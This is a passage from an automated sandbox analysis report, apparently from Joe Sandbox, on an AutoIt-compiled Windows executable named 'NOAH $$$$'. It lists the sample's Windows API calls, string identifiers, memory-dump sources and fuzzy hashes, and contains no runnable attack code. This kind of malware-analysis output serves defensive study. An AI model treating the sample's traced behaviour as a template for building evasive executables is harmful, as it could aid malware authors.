                                                                                                                                        • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                                                                                                        • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                                                                                                        • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                                                                                                        • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                                                                                                        • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                                                                                                        • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 00471E8A
                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                                                                                                        • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                                                                                                        • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                                                                                        • String ID: @$AutoIt v3 GUI
                                                                                                                                        • API String ID: 867697134-3359773793
                                                                                                                                        • Opcode ID: a77764dc97b758b9f138980a30eafcd252b45b083a0cf55b9ff7e92d3de70106
                                                                                                                                        • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                                                                                                        • Opcode Fuzzy Hash: a77764dc97b758b9f138980a30eafcd252b45b083a0cf55b9ff7e92d3de70106
                                                                                                                                        • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                                                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                        • API String ID: 1503153545-1459072770
                                                                                                                                        • Opcode ID: b1dcb5dacd1f2072149b846e72ce4b3dcf4a50df91d710b51ce636c939b7599d
                                                                                                                                        • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                                                                                                                        • Opcode Fuzzy Hash: b1dcb5dacd1f2072149b846e72ce4b3dcf4a50df91d710b51ce636c939b7599d
                                                                                                                                        • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __wcsicoll$__wcsnicmp
                                                                                                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                                                                                                        • API String ID: 790654849-32604322
                                                                                                                                        • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                                                                                        • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                                                                                                        • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                                                                                        • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e5b051fd50d99fa90b2629cec502b0b5abd27188c27a482d59dc70fd2e6235d1
                                                                                                                                        • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                                                                                                        • Opcode Fuzzy Hash: e5b051fd50d99fa90b2629cec502b0b5abd27188c27a482d59dc70fd2e6235d1
                                                                                                                                        • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                                                                                                        APIs
                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 2353593579-4108050209
                                                                                                                                        • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                                                                        • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                                                                                                        • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                                                                        • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                                                                                                        APIs
                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                                                                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                                                                                                        • GetWindowDC.USER32(?), ref: 0044A0F6
                                                                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                                                                                                        • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 0044A131
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                                                                                                        • GetSysColor.USER32(00000005), ref: 0044A15B
                                                                                                                                        • GetWindowDC.USER32(?), ref: 0044A1BE
                                                                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                                                                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                                                                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                                                                                                        • GetSysColor.USER32(00000008), ref: 0044A265
                                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                                                                                                        • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1744303182-0
                                                                                                                                        • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                                                                        • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                                                                                                        • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                                                                        • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                                                                                        • __mtterm.LIBCMT ref: 00417C34
                                                                                                                                          • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                                                                                          • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                                                                                          • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                                                                                                          • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                                                                                                        • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                                                                                                        • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                                                                                                        • __init_pointers.LIBCMT ref: 00417CE6
                                                                                                                                        • __calloc_crt.LIBCMT ref: 00417D54
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                        • API String ID: 4163708885-3819984048
                                                                                                                                        • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                                                                        • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                                                                                                        • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                                                                        • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                                                                                        • API String ID: 0-1896584978
                                                                                                                                        • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                                                                                        • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                                                                                                                        • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                                                                                        • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __wcsicoll$IconLoad
                                                                                                                                        • String ID: blank$info$question$stop$warning
                                                                                                                                        • API String ID: 2485277191-404129466
                                                                                                                                        • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                                                                        • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                                                                                                        • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                                                                        • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                                                                                                        APIs
                                                                                                                                        • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                                                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00454678
                                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 004546F5
                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00454765
                                                                                                                                        • GetDesktopWindow.USER32 ref: 0045476F
                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00454776
                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 004547D2
                                                                                                                                        • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                                                                                                        • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3869813825-0
                                                                                                                                        • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                                                                        • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                                                                                                        • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                                                                        • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                                                                                                        APIs
                                                                                                                                        • _wcslen.LIBCMT ref: 00464B28
                                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                                                                                                        • _wcslen.LIBCMT ref: 00464C28
                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                                                                                                        • _wcslen.LIBCMT ref: 00464CBA
                                                                                                                                        • _wcslen.LIBCMT ref: 00464CD0
                                                                                                                                        • _wcslen.LIBCMT ref: 00464CEF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcslen$Directory$CurrentSystem
                                                                                                                                        • String ID: D
                                                                                                                                        • API String ID: 1914653954-2746444292
                                                                                                                                        • Opcode ID: 5f72559f0a2586b771b9af551f03c1fb97e064fdb306134380bfcbf6c4a29eaa
                                                                                                                                        • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                                                                                                        • Opcode Fuzzy Hash: 5f72559f0a2586b771b9af551f03c1fb97e064fdb306134380bfcbf6c4a29eaa
                                                                                                                                        • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                                                                                                        APIs
                                                                                                                                        • _wcsncpy.LIBCMT ref: 0045CE39
                                                                                                                                        • __wsplitpath.LIBCMT ref: 0045CE78
                                                                                                                                        • _wcscat.LIBCMT ref: 0045CE8B
                                                                                                                                        • _wcscat.LIBCMT ref: 0045CE9E
                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                                                                                                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                                        • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                                                                                                        • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                                                                                                        • _wcscpy.LIBCMT ref: 0045CF61
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
